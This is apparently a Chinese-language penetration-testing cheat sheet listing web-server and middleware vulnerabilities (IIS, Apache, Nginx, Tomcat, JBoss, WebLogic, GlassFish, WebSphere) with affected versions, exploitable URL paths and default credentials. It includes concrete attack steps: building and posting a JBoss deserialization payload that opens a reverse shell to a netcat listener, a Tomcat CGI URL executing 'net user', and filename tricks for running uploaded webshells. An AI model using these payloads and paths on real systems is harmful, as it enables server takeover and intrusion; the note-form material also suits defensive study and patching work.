之前看吐司别人发的个文档,简单记的笔记

    IIS

    解析漏洞

    IIS 6

    *.asp;.jpg 会被当作 asp 解析

    *.asp / 目录下的文件会被当作 asp 解析

    asa cdx cer 后缀也会被当作 asp 解析

    IIS 7

    在 Fast-CGI 时, test.jpg 在 url 后加 /.php 即可解析成 php 文件

    PUT 任意文件写入

    开启了 WebDAV 并允许写入

    IIS 短文件漏洞

    CVE-2017-7269

    2003 r2 IIS 6 开启 WebDAV

    Apache

    解析漏洞

    未知扩展名解析漏洞

    1.php.xxx

    AddHandler 导致的解析漏洞

    如果有 “AddHandler application/x-httpd-php .php”, 只要有. php 后缀即可 a.php.jpg

    HTTPD 换行解析漏洞 CVE-2017-15715

    影响 2.4.0-2.4.29

    上传时文件名为 phpinfo.php 换行符, 访问 / phpinfo.php%0a

    Nginx

    Nginx 配置文件错误导致的解析漏洞

    info.jpg/1.php

    Nginx 空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37

    webshell 名为 a.jpg 访问 a.jpg 空字节. php

    Nginx 文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7

    上传时为 a.jpg 空格, 访问 a.jpg 空格空字节. php

    Nginx 配置错误导致的安全问题

    目录穿越

    在配置别名时, 忘记加 / 访问 / files../

    location /files {

    autoindex on;

    alias c:/WWW/home/;

    }

    目录遍历 autoindex 为 on

    Tomcat

    任意文件写入 CVE-2017-12615

    conf/web.xml 配置了 readonly=false, 可以往服务器 PUT 文件

    Tomcat 远程代码执行 CVE-2019-0232

    9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93

    随意上传 lxhsec.bat

    http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user

    Tomcat + 弱口令 && 后台 getshell 漏洞

    Tomcat manager App 暴力破解

    JBoss 默认端口 8080 9990

    JBoss 5/6 反序列化漏洞 CVE-2017-12149

    访问 / invoker/readonly 返回 500 说明存在页面

    利用工具: JavaDeserH2HC, 我们选择一个 Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:

    生成 ReverseShellCommonsCollectionsHashMap.class

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

    生成 ReverseShellCommonsCollectionsHashMap.ser

    java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip 是 nc 所在的 ip)

    利用:

    curl http://192.168.31.205:8080/invoker/readonly —data-binary @ReverseShellCommonsCollectionsHashMap.ser

    JBoss JMXInvokerServlet 反序列化漏洞

    /invoker/JMXInvokerServlet

    JBoss EJBInvokerServlet 反序列化漏洞

    /invoker/EJBInvokerServlet

    JBoss <=4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504

    /jbossmq-httpil/HTTPServerILServlet

    Administration Console 弱口令

    /admin-console/

    JMX Console 未授权访问

    /jmx-console/

    WebLogic 默认端口 7001

    XMLDecoder 反序列化漏洞 CVE-2017-10271 & CVE-2017-3506

    /wls-wsat/

    wls9_async_response,wls-wsat 反序列化漏洞 CVE-2019-2725

    /_async/

    /wls-wsat/

    WLS Core Components 反序列化漏洞 CVE-2018-2628

    通过 t3 协议触发

    WebLogic 任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3

    /ws_utc/config.do

    Weblogic SSRF 漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0

    /uddiexplorer/SearchPublicRegistries.jsp

    Weblogic 弱口令后台 getshell

    /console

    GlassFish 默认端口: 8080(Web 应用端口,即网站内容),4848(GlassFish 管理中心)

    GlassFish Directory Traversal(CVE-2017-1000028)

    %c0%af 作为 / 直接访问 / META-INF 下的敏感文件

    GlassFish 后台 Getshell

    WebSphere

    Java 反序列化 (CVE-2015-7450)

    访问 8880 端口

    弱口令后台 getshell

    6/7 版本, 后台只需输入 admin, 无需密码即可登录 websphere/ websphere system/ manager
    https://www.cnblogs.com/junmoxiao/p/11774772.html